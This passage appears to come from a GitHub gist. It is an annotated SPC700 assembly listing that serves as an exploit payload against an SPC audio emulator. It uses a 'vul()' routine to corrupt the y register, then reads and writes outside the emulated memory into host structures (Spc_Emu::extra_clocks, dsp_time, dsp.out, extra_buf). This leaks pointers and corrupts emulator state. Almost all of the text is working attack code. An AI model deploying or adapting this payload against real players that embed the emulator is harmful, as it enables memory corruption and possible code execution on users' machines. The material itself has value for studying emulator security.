f717: cd 08 mov x,#$08
f719: d8 04 mov $04,x
f71b: 3f 5d f8 call $f85d
ram[0x40] = 0xffff3800
f71e: cd 00 mov x,#$00
f720: d8 40 mov $40,x
f722: cd 38 mov x,#$38
f724: d8 41 mov $41,x
f726: cd ff mov x,#$ff
f728: d8 42 mov $42,x
f72a: cd ff mov x,#$ff
f72c: d8 43 mov $43,x
read(0xfe40, 0xfb3c, 4) ; ram[0x40](0xffff3800) -> 0xfffffd3c (Spc_Emu::extra_clocks)
f72e: cd 40 mov x,#$40
f730: d8 00 mov $00,x
f732: cd fe mov x,#$fe
f734: d8 01 mov $01,x
f736: cd 3c mov x,#$3c
f738: d8 02 mov $02,x
f73a: cd fb mov x,#$fb
f73c: d8 03 mov $03,x
f73e: cd 04 mov x,#$04
f740: d8 04 mov $04,x
f742: 3f 5d f8 call $f85d
ram[0x40] = 0
f745: cd 00 mov x,#$00
f747: d8 40 mov $40,x
f749: cd 00 mov x,#$00
f74b: d8 41 mov $41,x
f74d: cd 00 mov x,#$00
f74f: d8 42 mov $42,x
f751: cd 00 mov x,#$00
f753: d8 43 mov $43,x
read(0xfe40, 0xfb1c, 4) ; ram[0x40](0) -> 0xfffffd1c(Spc_Emu::dsp_time)
f755: cd 40 mov x,#$40
f757: d8 00 mov $00,x
f759: cd fe mov x,#$fe
f75b: d8 01 mov $01,x
f75d: cd 1c mov x,#$1c
f75f: d8 02 mov $02,x
f761: cd fb mov x,#$fb
f763: d8 03 mov $03,x
f765: cd 04 mov x,#$04
f767: d8 04 mov $04,x
f769: 3f 5d f8 call $f85d
ram[0x40] = 0
f76c: cd 00 mov x,#$00
f76e: d8 40 mov $40,x
f770: cd 00 mov x,#$00
f772: d8 41 mov $41,x
f774: cd 00 mov x,#$00
f776: d8 42 mov $42,x
f778: cd 00 mov x,#$00
f77a: d8 43 mov $43,x
f77c: cd 00 mov x,#$00
f77e: d8 44 mov $44,x
f780: cd 00 mov x,#$00
f782: d8 45 mov $45,x
f784: cd 00 mov x,#$00
f786: d8 46 mov $46,x
f788: cd 00 mov x,#$00
f78a: d8 47 mov $47,x
read(0xfe40, 0xf964, 8) ; ram[0x40](0) -> 0xfffffb64(Spc_Emu::dsp.out)
f78c: cd 40 mov x,#$40
f78e: d8 00 mov $00,x
f790: cd fe mov x,#$fe
f792: d8 01 mov $01,x
f794: cd 64 mov x,#$64
f796: d8 02 mov $02,x
f798: cd f9 mov x,#$f9
f79a: d8 03 mov $03,x
f79c: cd 08 mov x,#$08
f79e: d8 04 mov $04,x
f7a0: 3f 5d f8 call $f85d
call wait()
f7a3: 3f db f7 call $f7db
ram[0x10] = 0xf7b1
call vul() to corrupt y again
f7a6: cd b1 mov x,#$b1
f7a8: d8 10 mov $10,x
f7aa: cd f7 mov x,#$f7
f7ac: d8 11 mov $11,x
f7ae: 3f 2e f8 call $f82e
read(0xfb5c, 0xfexx, 8) ; 0xfffffd5c(extra_buf) -> out
f7b1: cd 5c mov x,#$5c
f7b3: d8 00 mov $00,x
f7b5: cd fb mov x,#$fb
f7b7: d8 01 mov $01,x
f7b9: cd 00 mov x,#$00
f7bb: d8 02 mov $02,x
f7bd: cd fe mov x,#$fe
f7bf: d8 03 mov $03,x
f7c1: cd 08 mov x,#$08
f7c3: d8 04 mov $04,x
f7c5: f8 09 mov x,$09
f7c7: d8 02 mov $02,x
f7c9: 3f 5d f8 call $f85d
return
f7cc: f8 12 mov x,$12
f7ce: d8 10 mov $10,x
f7d0: f8 13 mov x,$13
f7d2: d8 11 mov $11,x
f7d4: f8 11 mov x,$11
f7d6: 4d push x
f7d7: f8 10 mov x,$10
f7d9: 4d push x
f7da: 6f ret
}
; function wait()
{
; wait until y recovered
ram[0x00] = 0xfe02
f7db: cd 02 mov x,#$02
f7dd: d8 00 mov $00,x
f7df: cd fe mov x,#$fe
f7e1: d8 01 mov $01,x
ram[0x02] = 0x41
f7e3: cd 41 mov x,#$41
f7e5: d8 02 mov $02,x
ram[0x02] == [y + 0xfe02] ?
f7e7: f7 00 mov a,($00)+y
f7e9: 68 41 cmp a,#$41
f7eb: f0 fa beq $f7e7
f7ed: 6f ret
}
; function add(src @ ram[0x00], val @ ram[0x02], dst @ ram[0x04])
{
f7ee: cd 08 mov x,#$08 ; loop for 8 bytes
f7f0: 60 clrc ; clear carry, for clean addition
f7f1: 4d push x ; save x
f7f2: cd 00 mov x,#$00 ; x = 0
f7f4: e7 00 mov a,($00+x) ; read one byte
f7f6: 87 02 adc a,($02+x) ; add constant from table
f7f8: c7 04 mov ($04+x),a ; write one byte
f7fa: 3a 00 incw $00
f7fc: 3a 02 incw $02
f7fe: 3a 04 incw $04
f800: ce pop x
f801: 1d dec x
f802: d0 ed bne $f7f1
f804: 6f ret
}
; function sub(src @ ram[0x00], val @ ram[0x02], dst @ ram[0x04])
{
f805: cd 08 mov x,#$08
f807: 60 clrc
f808: 4d push x
f809: cd 00 mov x,#$00
f80b: e7 00 mov a,($00+x)
f80d: a7 02 sbc a,($02+x)
f80f: c7 04 mov ($04+x),a
f811: 3a 00 incw $00
f813: 3a 02 incw $02
f815: 3a 04 incw $04
f817: ce pop x
f818: 1d dec x
f819: d0 ed bne $f808
f81b: 6f ret
}
; unused
{
f81c: f8 04 mov x,$04
f81e: 4d push x
f81f: cd 00 mov x,#$00
f821: e7 00 mov a,($00+x)
f823: c7 02 mov ($02+x),a
f825: 3a 00 incw $00
f827: 3a 02 incw $02
f829: ce pop x
f82a: 1d dec x
f82b: d0 f1 bne $f81e
f82d: 6f ret
}
; function vul()
{
f82e: cd ff mov x,#$ff
f830: af mov (x)+,a
f831: 8d ff mov y,#$ff
f833: af mov (x)+,a
f834: dc dec y
f835: d0 fc bne $f833
f837: 7d mov a,x
f838: fd mov y,a
f839: af mov (x)+,a
f83a: af mov (x)+,a
f83b: 7d mov a,x
f83c: cf mul ya
f83d: dd mov a,y
f83e: 5d mov x,a
f83f: af mov (x)+,a
f840: af mov (x)+,a
f841: 7d mov a,x
f842: cf mul ya
f843: dd mov a,y
f844: 5d mov x,a
f845: af mov (x)+,a
f846: af mov (x)+,a
f847: 7d mov a,x
f848: cf mul ya
f849: dd mov a,y
f84a: 5d mov x,a
f84b: af mov (x)+,a
f84c: af mov (x)+,a
f84d: 7d mov a,x
f84e: cf mul ya
f84f: 5d mov x,a
f850: af mov (x)+,a
f851: af mov (x)+,a
f852: 9e div ya,x
f853: dd mov a,y
f854: 5d mov x,a
f855: 9e div ya,x ; y = ffff0200
f856: f8 11 mov x,$11
f858: 4d push x
f859: f8 10 mov x,$10
f85b: 4d push x
f85c: 6f ret
}
; read(src @ ram[0x00], dst @ ram[0x02], size @ ram[0x04])
{
f85d: f8 04 mov x,$04 ; x = size
f85f: f7 00 mov a,($00)+y ; a = [y + src]
f861: d7 02 mov ($02)+y,a ; [y + dst] = a
f863: 3a 00 incw $00 ; src ++
f865: 3a 02 incw $02 ; dst ++
f867: 1d dec x ; size --
f868: d0 f5 bne $f85f
f86a: 6f ret
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment